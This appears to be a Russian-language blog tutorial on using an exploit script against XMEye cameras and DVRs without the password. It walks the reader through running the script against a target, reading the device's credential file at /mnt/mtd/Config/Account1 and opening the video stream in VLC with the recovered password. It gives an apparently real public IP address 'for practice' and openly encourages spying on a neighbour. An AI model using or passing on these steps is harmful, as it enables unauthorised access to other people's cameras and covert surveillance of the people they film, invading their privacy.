XMEye — эксплойт как достать соседа

Простой метод посмотреть видео с камеры или регистратора не имея пароля от устройства. Мне нравится концепт игры Как достать соседа, и этот эксплойт имеет нечто общее со смыслом игры

  • Установить Python, по этой ссылке
  • Запустить командную строку Windows и перейти в папку с установленным Python
    cmd — запуск командной строки
    cd C:\python27-x64 — полный путь к Python
  • Узнать IP камеры или регистратора, это может быть как устройство в локальной сети так и в сети Интернет
    Вот IP для тренировок 116.35.165.254:8000
  • Скачать эксплойт по этой ссылке и скопировать его в папку Python
  • Запустить команду python xm.py IP_устройства
    Пример: python xm.py 116.35.165.254:8000
    Нужно указывать веб-порт, тот что отображается в браузере
  • После этого ввести команду /mnt/mtd/Config/Account1
    Если скрипт работает, то Вы увидите зашифрованный пароль, если не работает будет выведено сообщение что файл не найден
  • Теперь можно пробовать посмотреть картинку с камеры
    Скачиваем VLC плеер по ссылке, и нажимаем Загрузить VLC. Затем устанавливаем плеер
  • В открытом окне плеер нажимаем комбинацию клавиш CTRL+N, и в окне что появилось вводим эти данные предварительно изменив на свои
    rtsp://IP:Port/user=admin&password=admin&channel=1&stream=0.sdp?
    IP — IP камеры или регистратора
    Port — по умолчанию 554
    password=admin следует вместо admin указать пароль которые Вы узнали выше
    Пример строки с моей камеры
    rtsp://192.168.88.4:554/user=admin&password=CTUEaqgz&channel=1&stream=0.sdp?
  • Теперь можно подсмотреть за соседом и достать его 🙂